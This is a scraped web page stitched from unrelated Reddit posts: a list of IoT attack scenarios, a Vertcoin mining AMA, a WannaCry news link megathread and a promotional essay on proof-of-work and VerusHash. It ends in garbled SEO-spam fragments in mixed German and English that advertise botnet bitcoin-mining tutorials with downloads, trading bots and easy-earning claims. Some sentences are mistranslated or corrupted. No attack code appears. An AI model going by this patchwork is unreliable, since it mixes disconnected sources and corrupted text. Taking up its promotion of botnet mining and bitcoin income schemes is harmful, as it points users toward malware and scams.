The attackers sent no more than 10 messages from each device, which makes it very difficult to block or determine the location of the incident.
This first attack was not far from the last.
IoT spam attacks continued in the fall with the Linux.ProxyM IoT botnet.
  1. APTs In recent years, advanced persistent threats (APTs) have become a serious concern for security professionals.
APTs are carried out by funded and widespread attackers such as nation states or corporations that launch complex cyberattacks that are difficult to prevent or mitigate.
For example, the Stuxnet worm, which destroyed Iranian nuclear centrifuges and hacking Sony Pictures 2014, was attributed to nation states.
Because the critical infrastructure is connected to the Internet, many experts warn that APTs may launch a power-oriented IoT attack, industrial control systems, or other systems connected to the Internet.
Some even warn that terrorists could launch an attack on iOT, which could harm the global economy.
  1. Ransomware Ransomware has become too common on home PCs and corporate networks. Now experts say that it is only a matter of time before the attackers begin to block smart devices. Security researchers have already demonstrated the ability to install ransomware on smart thermostats. For example, they can raise the temperature to 95 degrees and refuse to return it to its normal state until the owner agrees to pay a ransom in Bitcoins. They can also launch similar attacks on garage doors, vehicles, or even appliances. How much would you pay to unlock your smart coffee pot first thing in the morning?
  2. Data theft Obtaining important data, such as customer names, credit card numbers, social security numbers, and other personal information, is still one of the main goals of cyber attacks.
IoT devices represent a whole new vector of attack for criminals looking for ways to invade corporate or home networks.
For example, if an improperly configured device or IoT sensor is connected to corporate networks, this can give attackers a new way to enter the network and potentially find the valuable data that they need.
  1. Home theft As smart locks and smart garage doors become more commonplace, it is also more likely that cybercriminals can become real thieves.
Home systems that are not properly protected can be vulnerable to criminals with sophisticated tools and software.
Security researchers are unlikely to have shown that itís quite easy to break into a house through smart locks from several different manufacturers, and smart garage doors do not seem to be much safer.
  1. Communication with children One of the most disturbing IoT security stories came from children.
One couple discovered that the stranger not only used his monitor for children to spy on their three-year-old son, this stranger also spoke with his child through the device.
Mother heard an unknown voice: ìWake up, boy, dad is looking for you,î and the child said that he was scared because at night someone was talking to him on an electronic device.
As more and more children’s gadgets and toys connect to the Internet, it seems likely that these frightening scenarios may become more common.
  1. Remote control of a vehicle As vehicles become smarter and more accessible on the Internet, they also become vulnerable to attack.
Hackers have shown that they can take control of a jeep, maximize air conditioning, change the radio station, start the wipers, and ultimately slow down the car.
The news led to the recall of 1.4 million cars, but whitehat researchers, following the original exploit, said they discovered additional vulnerabilities that were not fixed by the Chrysler patch applied to the recalled cars.
Although experts say the automotive industry is doing a great job of ensuring vehicle safety, it is almost certain that attackers will find new vulnerabilities in such smart cars.
  1. Personal attacks Sometimes IoT covers more than just devices – it can also include people who have connected medical devices implanted in their bodies.
An episode of the television series Homeland attempted a murder aimed at an implanted medical device, and former vice president Dick Cheney was so worried about this scenario that he turned off the wireless capabilities on his implanted defibrillator.
This kind of attack has not yet happened in real life, but it remains possible, as many medical devices become part of the IoT.
submitted by farabijfa to u/farabijfa [link] [comments]

Vertcoin Mining AMA

What is Vertcoin?

Vertcoin was created in 2014. It is a direct hedge against long term mining consensus centralization on the Bitcoin mining network. Vertcoin achieves its mining consensus solely through Graphics Cards as they are the most abundant / widely available consensus devices that produce a reasonable amount of hashrate. This is done using a mining algorithm that deliberately geared against devices like ASICs, FPGAs and CPUs (due to botnets) making them extremely inefficient. Consensus distribution over time is the most important aspect of a blockchain and should not be taken lightly. It is critical that you understand what blockchain specifications mean/do to fully understand Vertcoin.

Mining Vertcoin

When users of our network send each other Vertcoin, their transactions are secured by a process called mining. Miners will compose a so-called block out of the pending transactions, and need to perform a large number of computations called hashes in order to produce the Proof-of-Work. With this Proof-of-Work, the block is accepted by the network and the transactions in it become confirmed.
Mining is essentially a race. Whoever finds a valid Proof-of-Work and gets the block propagated over more than half of the Vertcoin network first, wins this race and is allowed to reward themselves with the block reward. The block reward is how new Vertcoin come in circulation. This block reward started at 50 VTC when Vertcoin was launched, and halves every four years. The current block reward is 25 VTC.
Vertcoin's One Click Miner: https://github.com/vertcoin-project/One-Click-Minereleases
Learn more about mining here: https://vertcoin.org/mine/
Specification List:
· Launch date: Jan 11, 2014
· Proof-Of-Work (Consensus Mechanism)
· Total Supply: 84,000,000 Vertcoin
· Preferred Consensus Device: GPU
· Mining Algorithm: Lyra2REv3 (Made by Vertcoin)
· Blocktime: 2.5 minutes
· SegWit: Activated
· Difficulty Adjustment Algorithm: Kimoto Gravity Well (Every Block)
· Block Halving: 4 year interval
· Initial Block Reward: 50 coins
· Current Block Reward: 25 coin
More spec information can be found here: https://vertcoin.org/specs-explained/

Why Does Vertcoin Use GPUs Then?

ASIC’s (Manufactuer Monopoly)
If mining were just a spade sure, use the most powerful equipment which would be an ASIC. The problem is ASICs are not widely available, and just happen to be controlled by a monopoly in China.
So, you want the most widely available tool that produces a fair amount of hashrate, which currently manifests itself as a Graphics Card.
CPUs would be great too but unfortunately there are viruses that take over hundreds of thousands of computers called Botnets (they’re almost as bad as ASICs).

Mining In Pools

Because mining is a race, it’s difficult for an individual miner to acquire enough computational power to win this race solo. Therefore there’s a concept called pool-mining. With pool-mining, miners cooperate in finding the correct Proof-of-Work for the block, and share the block reward based on the work contributed. The amount of work contributed is measured in so-called shares. Finding the Proof-of-Work for a share is much easier than finding it for a block, and when the cooperating miners find the Proof-of-Work for the block, they distribute the reward based on the number of shares each miner found. Vertcoin always recommends using P2Pool to keep mining as decentralized as possible.
How Do I Get Started?
If you want to get started mining, check out the Mine Vertcoin page.

Vertcoin just forked to Lyra2REv3 and we are currently working on Verthash

Verthash is and was under development before we decided to hard fork to Lyra2REv3. While Verthash would’ve resulted in the same effect for ASICs (making them useless for mining Vertcoin), the timeline was incompatible with the desire to get rid of ASICs quickly. Verthash is still under development and tries to address the outsourcability problem.
Verthash is an I/O bound algorithm that uses the blockchain data as input to the hashing algorithm. It therefore requires miners to have all the blockchain data available to them, which is currently about 4 GB of data. By making this mining data mandatory, it will become harder for auto profit switching miners — like the ones that rent out their GPU to Nicehash — because they will need to keep a full node running while mining other algorithms for the moment Verthash becomes more profitable — the data needs to be available immediately since updating it can take a while.
Over the past month, we have successfully developed a first implementation of Verthash in the Vertcoin Core code base. Within the development team we have run a few nodes on Testnet to test the functionality — and everything seems to work properly. The next step is to build out the GPU miners for AMD and Nvidia. This is a NOETA at the moment, since we’re waiting on GPU developers which are in high demand. Once the miners are ready, we’ll be releasing the Vertcoin 0.15 beta that hardforks the testnet together with the miners for the community to have a testrun. Given the structural difference between Lyra2RE and Verthash, we’ll have to run the testnet for a longer period than we did with the Lyra2REv3 hard fork. We’ll have to make sure the system is reliable before hardforking our mainnet. So the timeline will be longer than with the Lyra2REv3 hard fork.
Some people in the community have voiced concerns about the fact that Verthash development is not being done “out in the open”, i.e.: the code commits are not visible on Github. The main two reasons for us to keep our cards to our chest at this stage are: (1) only when the entire system including miners has been coded up can we be sure the system works, we don’t want to release preliminary stuff that doesn’t work or isn’t secure. Also (2) we don’t want to give hardware manufacturers or mining outsourcing platforms a head start on trying to defeat the mechanisms we’ve put in place.

Links and Resources

· Twitter: https://twitter.com/Vertcoin
· Donations: vertcoin.org/donate
· Join our Discord: https://discord.gg/vertcoin
· Reddit: https://www.reddit.com/vertcoin/
· Official Website: https://vertcoin.org/
· Facebook: https://www.facebook.com/vertcoin
· Vertcoin Talk: https://soundcloud.com/vertcoin-talk
· Youtube: https://www.youtube.com/vertcoin
submitted by Canen01 to gpumining [link] [comments]

Ransomeware Cyberattack Mega-Thread

Hi folks,
In light of the ongoing world-wide cyberattack/ransomware issue at the moment, we have decided to set up a mega-thread to contain all of the news and updates as things unfold. If you find new news or stories about the attacks, please do not submit them to the sub, please submit them here and I will periodically add the new links to a growing list. Pre-existing posts will remain but all new posts will be removed and directed here. Thank you to everyone who has posted and help spread the news so far!
EDIT: You can download the standalone update here directly from Microsoft.
SEE ALSO: /PCMasterRace discussion
(Sorted by newest first) (Updated May 15th 4PM (-8gmt))
Submitter Discussion Link
ManiaforBeatles Discussion Researchers see possible North Korea link to global cyber attack
jimrosenz Discussion Hardly Anyone Paying the Hackers? Because Using Bitcoin Is Hard
Ilikespacestuff Discussion The WannaCry ransomware has mysterious ties to North Korea
MBrandonLee Discussion The WannaCry ransomware attack was temporarily halted. But it’s not over yet.
OmahaVike Discussion Researchers: WannaCry ransomware shares code with North Korean malware - CyberScoop
swinglinefan Discussion The WannaCry Ransomware Hackers Made Some Major Mistakes
capcaunul Discussion WannaCry hackers had no intention of giving users their files back even if they pay
SuccessHook Discussion Microsoft says governments should stop 'hoarding' security vulnerabilities after WannaCry attack
zsreport Discussion WannaCry Ransomware: Microsoft Calls Out NSA For 'Stockpiling' Vulnerabilities
PCisLame Discussion Cyber attack latest: Vladimir Putin blames US for hack as thousands more computers hit by ransomware
PCisLame Discussion Worldwide ransomware attacks: What we know so far
bevmoon Discussion Worldwide cyberattack could spark more trouble Monday
marypin Discussion Microsoft’s response to widespread cyber attacks may make you WannaCry
dinesh848 Discussion What Is WannaCry, Who Is Affected, and Everything Else You Need to Know About It
destinyland Discussion Microsoft blasts spy agencies for leaked exploits used by WanaDecrypt0r
proto-sinaitic Discussion Microsoft calls out NSA, CIA for 'stockpiling of vulnerabilities' after major ransomware cyberattack
screaming_librarian Discussion Microsoft blames US Government for 'WannaCrypt' ransomware disaster
mikekavish Discussion Aftershocks May Last as U.S. Warns of Malware’s Complex Components
littleaurora Discussion If You Still Use Windows XP, Prepare For the Worst
temporarycreature Discussion Microsoft president blasts NSA for its role in 'WannaCry' computer ransom attack
PCisLame Discussion An unprecedented "ransomware" cyberattack that has already hit tens of thousands of victims in 150 countries could wreak greater havoc as more malicious variations appear and people return to their desks Monday and power up computers at the start of the workweek.
geekdad Discussion WCry/WanaCry Ransomware Technical Analysis
Blueismyfavcolour Discussion Revealed: The 22-year-old IT expert who saved the world from ransomware virus but lives for surfing
geekdad Discussion Microsoft's response to WannaCrypt
BlaqkAngel Discussion WannaCry - New Variants Detected
Greg-2012 Discussion 'Accidental hero' halts ransomware attack and warns: this is not over
Greg-2012 Discussion WannaCry ransomware: Researcher halts its spread by registering domain for $10.69
iliketechnews Discussion Global ‘Wana’ Ransomware Outbreak Earned Perpetrators $26,000 So Far
jb2386 Discussion Global ransomware cyberattack halted by a young engineer's opportunistic domain registration
mvea Discussion Defence Secretary unable to deny Trident nuclear submarines run on same outdated software hackers exploited to cripple NHS systems: 'I have complete confidence in our nuclear deterrent'
gankstar5 Discussion Cyber-attack threat escalating - Europol
Diazepam Discussion It's Not Over, WannaCry 2.0 Ransomware Just Arrived With No 'Kill-Switch'
Captain_CockSmith Discussion For $10.69, British Researcher Slows Global Cyberattack
f0li Discussion A 22-year-old spent $11 and thwarted the global cyber attack
bulldog75 Discussion Ransomware attack reveals breakdown in US intelligence protocols, expert says
ManiaforBeatles Discussion A British researcher unexpectedly found and activated a "kill switch" to an "unprecedented" ransomware cyberattack that hit hundreds of thousands of computers around the globe at hospitals, government offices, transportation systems and major companies, including FedEx.
LazyProspector Discussion Global cyber-attack: Security blogger halts ransomware 'by accident'
f0li Discussion How to Accidentally Stop a Global Cyber Attacks
PCisLame Discussion Edward Snowden points blame at NSA for not preventing NHS cyber attack
ppumkin Discussion NHS Hit by Ransomware.. and many others too!
viperex Discussion A Massive Ransomware 'Explosion' Is Hitting Targets All Over the World
Mattroeing Discussion Cyber attack spreads across 74 countries; some UK hospitals crippled
Lettershort Discussion Microsoft patches Windows XP to fight 'WannaCrypt' attacks
Doener23 Discussion 'Accidental hero' finds kill switch to stop spread of ransomware cyber-attack
gumgum_bazuka Discussion UK hospitals hit with massive ransomware attack
mikekavish Discussion Wanna Decryptor: what is the NSA 'atom bomb of ransomware' behind the NHS attack?
FortuitousAdroit Discussion Player 3 Has Entered the Game: Say Hello to 'WannaCry'
FortuitousAdroit Discussion Customer Guidance for WannaCrypt attacks; Microsoft releases WannaCrypt protection for out-of-support products Windows XP, Windows 8, & Windows Server 2003
middleeastnewsman Discussion NHS cyber-attack: Amber Rudd says lessons must be learnt
FortuitousAdroit Discussion 'Accidental hero' finds kill switch to stop spread of ransomware cyber-attack
campuscodi Discussion Microsoft Releases Patch for Older Windows Versions to Protect Against Wana Decrypt0r
_JCDK Discussion PSA: Kill switch for WannaCry found and active.
bevmoon Discussion Researcher finds 'kill switch' for cyberattack ransomeware
HaroldSmith_1 Discussion Malware, from NSA documents, hacks computers worldwide
FortuitousAdroit Discussion Huge Ransomware Attack Spreads Across Globe: What to Do
jimmyradola Discussion Major Cyber-Attack Hits NHS - Hackers Demand Ransom £233
maxwellhill Discussion NSA Tools, Built Despite Warnings, Used in Global Cyber Attack
tellman1257 Discussion Full coverage of the massive ransomware attacks that hit hospitals across the world today, May 12, 2017 (Click the downward arrow to the left of "More" to see all headlines and tweets)
littleaurora Discussion Update your Windows systems now. Right now.
FortuitousAdroit Discussion Wcrypt 'ransom ware' infections over the last 24 hours
stupidstupidreddit Discussion Global extortion cyberattack hits dozens of nations
FortuitousAdroit Discussion Leaked NSA Malware Is Helping Hijack Computers Around the World
Imnaha2 Discussion Massive Global Ransomware Attack Underway, Patch Available
BauerHouse Discussion Massive ransomware cyber-attack hits 74 countries around the world
eye_josh Discussion What We Know and Don't Know About the International Cyberattack, NYT Live updates
Lighting Discussion Massive Malware Cyberattack Hits English Hospitals, FedEx. Attackers demand bitcoin.
aaron7897 Discussion Massive ransomware attack hits 74 countries
rafaelloaa Discussion Malware, described in leaked NSA documents, cripples computers worldwide
callcybercop Discussion Ransomware infections reported worldwide
PHPiyan Discussion NHS cyber-attack: GPs and hospitals hit by ransomware - BBC News
nowhathappenedwas Discussion Apparent NSA tools behind massive hospital ransomware attacks around the world
I_have_no_mercy Discussion Cyberattacks in 12 Nations Said to Use Leaked N.S.A. Hacking Tool
thatshirtman Discussion Ransomware infections reported worldwide
ancsunamun Discussion WannaCrypt0r Ransomware Using NSA Exploit Leaked by Shadow Brokers Is on a Rampage
stupidstupidreddit Discussion English hospitals divert ambulances after 'ransomware' cyber attack
Bevmoon Discussion Hospitals across England hit by ransomware cyber attack, systems knocked offline
Imnaha2 Discussion WCry ransomware explodes in massive distribution wave
paradiselost79 Discussion NHS England hit by 'cyber attack'
sidcool1234 Discussion NHS hospitals hit by cyber attack 'creeping' across England
Henderino Discussion NHS England hit by 'cyber attack'
LUXURY_COMMUNISM_NOW Discussion NHS cyber attack: Large-scale hack forces hospitals across England to divert emergency patients
I_have_no_mercy Discussion Cyberattacks in 12 Nations Said to Use Leaked N.S.A. Hacking Tool
Grepnork Discussion Hospitals across England hit by large-scale cyber-attack
TheoDW Discussion Spanish companies hit by ransomware cyber attack
submitted by abrownn to technology [link] [comments]

The Problem with PoW

The Problem with PoW
Miners have always had it rough..
"Frustrated Miners"

The Problem with PoW
(and what is being done to solve it)

Proof of Work (PoW) is one of the most commonly used consensus mechanisms entrusted to secure and validate many of today’s most successful cryptocurrencies, Bitcoin being one. Battle-hardened and having weathered the test of time, Bitcoin has demonstrated the undeniable strength and reliability of the PoW consensus model through sheer market saturation, and of course, its persistency.
In addition to the cost of powerful computing hardware, miners prove that they are benefiting the network by expending energy in the form of electricity, by solving and hashing away complex math problems on their computers, utilizing any suitable tools that they have at their disposal. The mathematics involved in securing proof of work revolve around unique algorithms, each with their own benefits and vulnerabilities, and can require different software/hardware to mine depending on the coin.
Because each block has a unique and entirely random hash, or “puzzle” to solve, the “work” has to be performed for each block individually and the difficulty of the problem can be increased as the speed at which blocks are solved increases.

Hashrates and Hardware Types

While proof of work is an effective means of securing a blockchain, it inherently promotes competition amongst miners seeking higher and higher hashrates due to the rewards earned by the node who wins the right to add the next block. In turn, these higher hash rates benefit the blockchain, providing better security when it’s a result of a well distributed/decentralized network of miners.
When Bitcoin first launched its genesis block, it was mined exclusively by CPUs. Over the years, various programmers and developers have devised newer, faster, and more energy efficient ways to generate higher hashrates; some by perfecting the software end of things, and others, when the incentives are great enough, create expensive specialized hardware such as ASICs (application-specific integrated circuit). With the express purpose of extracting every last bit of hashing power, efficiency being paramount, ASICs are stripped down, bare minimum, hardware representations of a specific coin’s algorithm.
This gives ASICS a massive advantage in terms of raw hashing power and also in terms of energy consumption against CPUs/GPUs, but with significant drawbacks of being very expensive to design/manufacture, translating to a high economic barrier for the casual miner. Due to the fact that they are virtual hardware representations of a single targeted algorithm, this means that if a project decides to fork and change algorithms suddenly, your powerful brand-new ASIC becomes a very expensive paperweight. The high costs in developing and manufacturing ASICs and the associated risks involved, make them unfit for mass adoption at this time.
Somewhere on the high end, in the vast hashrate expanse created between GPU and ASIC, sits the FPGA (field programmable gate array). FPGAs are basically ASICs that make some compromises with efficiency in order to have more flexibility, namely they are reprogrammable and often used in the “field” to test an algorithm before implementing it in an ASIC. As a precursor to the ASIC, FPGAs are somewhat similar to GPUs in their flexibility, but require advanced programming skills and, like ASICs, are expensive and still fairly uncommon.

2 Guys 1 ASIC

One of the issues with proof of work incentivizing the pursuit of higher hashrates is in how the network calculates block reward coinbase payouts and rewards miners based on the work that they have submitted. If a coin generated, say a block a minute, and this is a constant, then what happens if more miners jump on a network and do more work? The network cannot pay out more than 1 block reward per 1 minute, and so a difficulty mechanism is used to maintain balance. The difficulty will scale up and down in response to the overall nethash, so if many miners join the network, or extremely high hashing devices such as ASICs or FPGAs jump on, the network will respond accordingly, using the difficulty mechanism to make the problems harder, effectively giving an edge to hardware that can solve them faster, balancing the network. This not only maintains the block a minute reward but it has the added side-effect of energy requirements that scale up with network adoption.
Imagine, for example, if one miner gets on a network all alone with a CPU doing 50 MH/s and is getting all 100 coins that can possibly be paid out in a day. Then, if another miner jumps on the network with the same CPU, each miner would receive 50 coins in a day instead of 100 since they are splitting the required work evenly, despite the fact that the net electrical output has doubled along with the work. Electricity costs miner’s money and is a factor in driving up coin price along with adoption, and since more people are now mining, the coin is less centralized. Now let’s say a large corporation has found it profitable to manufacture an ASIC for this coin, knowing they will make their money back mining it or selling the units to professionals. They join the network doing 900 MH/s and will be pulling in 90 coins a day, while the two guys with their CPUs each get 5 now. Those two guys aren’t very happy, but the corporation is. Not only does this negatively affect the miners, it compromises the security of the entire network by centralizing the coin supply and hashrate, opening the doors to double spends and 51% attacks from potential malicious actors. Uncertainty of motives and questionable validity in a distributed ledger do not mix.
When technology advances in a field, it is usually applauded and welcomed with open arms, but in the world of crypto things can work quite differently. One of the glaring flaws in the current model and the advent of specialized hardware is that it’s never ending. Suppose the two men from the rather extreme example above took out a loan to get themselves that ASIC they heard about that can get them 90 coins a day? When they join the other ASIC on the network, the difficulty adjusts to keep daily payouts consistent at 100, and they will each receive only 33 coins instead of 90 since the reward is now being split three ways. Now what happens if a better ASIC is released by that corporation? Hopefully, those two guys were able to pay off their loans and sell their old ASICs before they became obsolete.
This system, as it stands now, only perpetuates a never ending hashrate arms race in which the weapons of choice are usually a combination of efficiency, economics, profitability and in some cases control.

Implications of Centralization

This brings us to another big concern with expensive specialized hardware: the risk of centralization. Because they are so expensive and inaccessible to the casual miner, ASICs and FPGAs predominantly remain limited to a select few. Centralization occurs when one small group or a single entity controls the vast majority hash power and, as a result, coin supply and is able to exert its influence to manipulate the market or in some cases, the network itself (usually the case of dishonest nodes or bad actors).
This is entirely antithetical of what cryptocurrency was born of, and since its inception many concerted efforts have been made to avoid centralization at all costs. An entity in control of a centralized coin would have the power to manipulate the price, and having a centralized hashrate would enable them to affect network usability, reliability, and even perform double spends leading to the demise of a coin, among other things.
The world of crypto is a strange new place, with rapidly growing advancements across many fields, economies, and boarders, leaving plenty of room for improvement; while it may feel like a never-ending game of catch up, there are many talented developers and programmers working around the clock to bring us all more sustainable solutions.

The Rise of FPGAs

With the recent implementation of the commonly used coding language C++, and due to their overall flexibility, FPGAs are becoming somewhat more common, especially in larger farms and in industrial setting; but they still remain primarily out of the hands of most mining enthusiasts and almost unheard of to the average hobby miner. Things appear to be changing though, one example of which I’ll discuss below, and it is thought by some, that soon we will see a day when mining with a CPU or GPU just won’t cut it any longer, and the market will be dominated by FPGAs and specialized ASICs, bringing with them efficiency gains for proof of work, while also carelessly leading us all towards the next round of spending.
A perfect real-world example of the effect specialized hardware has had on the crypto-community was recently discovered involving a fairly new project called VerusCoin and a fairly new, relatively more economically accessible FPGA. The FPGA is designed to target specific alt-coins whose algo’s do not require RAM overhead. It was discovered the company had released a new algorithm, kept secret from the public, which could effectively mine Verus at 20x the speed of GPUs, which were the next fastest hardware types mining on the Verus network.
Unfortunately this was done with a deliberately secret approach, calling the Verus algorithm “Algo1” and encouraging owners of the FPGA to never speak of the algorithm in public channels, admonishing a user when they did let the cat out of the bag. The problem with this business model is that it is parasitic in nature. In an ecosystem where advancements can benefit the entire crypto community, this sort of secret mining approach also does not support the philosophies set forth by the Bitcoin or subsequent open source and decentralization movements.
Although this was not done in the spirit of open source, it does hint to an important step in hardware innovation where we could see more efficient specialized systems within reach of the casual miner. The FPGA requires unique sets of data called a bitstream in order to be able to recognize each individual coin’s algorithm and mine them. Because it’s reprogrammable, with the support of a strong development team creating such bitstreams, the miner doesn’t end up with a brick if an algorithm changes.

All is not lost thanks to.. um.. Technology?

Shortly after discovering FPGAs on the network, the Verus developers quickly designed, tested, and implemented a new, much more complex and improved algorithm via a fork that enabled Verus to transition smoothly from VerusHash 1.0 to VerusHash 2.0 at block 310,000. Since the fork, VerusHash 2.0 has demonstrated doing exactly what it was designed for- equalizing hardware performance relative to the device being used while enabling CPUs (the most widely available “ASICs”) to mine side by side with GPUs, at a profit and it appears this will also apply to other specialized hardware. This is something no other project has been able to do until now. Rather than pursue the folly of so many other projects before it- attempting to be “ASIC proof”, Verus effectively achieved and presents to the world an entirely new model of “hardware homogeny”. As the late, great, Bruce Lee once said- “Don’t get set into one form, adapt it and build your own, and let it grow, be like water.”
In the design of VerusHash 2.0, Verus has shown it doesn’t resist progress like so many other new algorithms try to do, it embraces change and adapts to it in the way that water becomes whatever vessel it inhabits. This new approach- an industry first- could very well become an industry standard and in doing so, would usher in a new age for proof of work based coins. VerusHash 2.0 has the potential to correct the single largest design flaw in the proof of work consensus mechanism- the ever expanding monetary and energy requirements that have plagued PoW based projects since the inception of the consensus mechanism. Verus also solves another major issue of coin and net hash centralization by enabling legitimate CPU mining, offering greater coin and hashrate distribution.
Digging a bit deeper it turns out the Verus development team are no rookies. The lead developer Michael F Toutonghi has spent decades in the field programming and is a former Vice President and Technical Fellow at Microsoft, recognized founder and architect of Microsoft's .Net platform, ex-Technical Fellow of Microsoft's advertising platform, ex-CTO, Parallels Corporation, and an experienced distributed computing and machine learning architect. The project he helped create employs and makes use of a diverse myriad of technologies and security features to form one of the most advanced and secure cryptocurrency to date. A brief description of what makes VerusCoin special quoted from a community member-
"Verus has a unique and new consensus algorithm called Proof of Power which is a 50% PoW/50% PoS algorithm that solves theoretical weaknesses in other PoS systems (Nothing at Stake problem for example) and is provably immune to 51% hash attacks. With this, Verus uses the new hash algorithm, VerusHash 2.0. VerusHash 2.0 is designed to better equalize mining across all hardware platforms, while favoring the latest CPUs over older types, which is also one defense against the centralizing potential of botnets. Unlike past efforts to equalize hardware hash-rates across different hardware types, VerusHash 2.0 explicitly enables CPUs to gain even more power relative to GPUs and FPGAs, enabling the most decentralizing hardware, CPUs (due to their virtually complete market penetration), to stay relevant as miners for the indefinite future. As for anonymity, Verus is not a "forced private", allowing for both transparent and shielded (private) transactions...and private messages as well"

If other projects can learn from this and adopt a similar approach or continue to innovate with new ideas, it could mean an end to all the doom and gloom predictions that CPU and GPU mining are dead, offering a much needed reprieve and an alternative to miners who have been faced with the difficult decision of either pulling the plug and shutting down shop or breaking down their rigs to sell off parts and buy new, more expensive hardware…and in so doing present an overall unprecedented level of decentralization not yet seen in cryptocurrency.
Technological advancements led us to the world of secure digital currencies and the progress being made with hardware efficiencies is indisputably beneficial to us all. ASICs and FPGAs aren’t inherently bad, and there are ways in which they could be made more affordable and available for mass distribution. More than anything, it is important that we work together as communities to find solutions that can benefit us all for the long term.

In an ever changing world where it may be easy to lose sight of the real accomplishments that brought us to this point one thing is certain, cryptocurrency is here to stay and the projects that are doing something to solve the current problems in the proof of work consensus mechanism will be the ones that lead us toward our collective vision of a better world- not just for the world of crypto but for each and every one of us.
submitted by Godballz to CryptoCurrency [link] [comments]

Botnet: Silent Bitcoin Mining - Tutorial + downloads! [Pool Support] CloudBots: Harvesting Crypto Coins Like a Botnet Farmer Bitcoin Trading Bot (Tutorial) - YouTube Botcoin: Bitcoin-mining on botnets (NDSS '14 talk) Make $50 in Bitcoin BTC Crypto a day!

Bitcoin-Mining-Botnetz um 500.000 Bots erleichtert Symantec hat einen Teil des Peer-to-Peer-Botnetzes ZeroAccess ausgehoben, dabei half eine Software-Schwachstelle. Arbitrage bot trading, make profits by trading the different coin prices between exchanges, buy bitcoin or other crypto on the cheapest exchange and sell on the most expensive. AUTOMATED CRYPTO LENDING BOT Make loans, using the artificial intelligence to invest in the currency that has the most deficit, Bitcoin, Litecoin, Dash, Dollar, thus, earning a greater interest INDICATORS Add from many ... Interestingly, Bitcoin is no more the number one coin among cybercriminals. It is slow and requires high transaction fees. Monero has become very popular for its easy mining, and Dash is the best coin for ransomware authors. Here are the top 3 crypto mining botnets: 1) Smominru, the Biggest Mining Botnet to Date. Also referred to as MyKings, Smominru is a gigantic Monero-mining botnet ... Free Bitcoin - Earn free bitcoin Give us 5 minutes of your time, and we'll send you $10 worth of bitcoin. Create Wallet; Enter Address; What do I have to do? In order to pay you, you will need to create a bitcoin wallet, if you do not have one, we strongly recommend coinbase: Create Wallet . Enter Address. We can only automate payments to Coinbase wallets, if you have a wallet managed by ... Unfortunately for the cybercrooks, however, it seems that a botnet-turned-mining rig doesn't actually make much money in real life. McAfee found that the increasing difficulty of Bitcoin hashes, combined with the attrition rate from malware detections on infected machines, would make turning a profit from botnet mining nearly impossible.

[index] [27314] [36370] [12559] [24223] [30371] [33556] [13670] [41911] [5522] [10210]

Botnet: Silent Bitcoin Mining - Tutorial + downloads! [Pool Support]

MasterMana BotNet Virus steals Cryptocurrency - MasterMana BotNet wants your Bitcoin - Duration: 8:26. Crypto Coin Investor 130 views. 8:26. 7) Soldering + Tools for (almost) ... Cryptocurrency can be a high-risk, high-reward game for those willing to deal with the volatility. Can we use AI to help us make predictions about Bitcoin's ... A post explaining how bitcoins work, an idea of how botnets would mine for you and a proof of concept of the idea! The post contains downloads to TweMiner and kMiner V2! TweMiner is a botnet-miner ... Bitcoin Typer Pro 2.1 - A Full Auto Bitcoin Faucet Bot (2captcha) - Duration: 3:58. Bitcoin Tpyer 18,990 views. 3:58. 25 Secrets Casinos REALLY Don’t Want You To Know - Duration: 8:49. ... Bitcoin Bot 2017 Earn 1 Bitcoin per Month - Duration: 3:35. Earning Money 74,279 views. 3:35. Copy & Paste Videos and Earn $100 to $300 Per Day - FULL TUTORIAL (Make Money Online) ...

#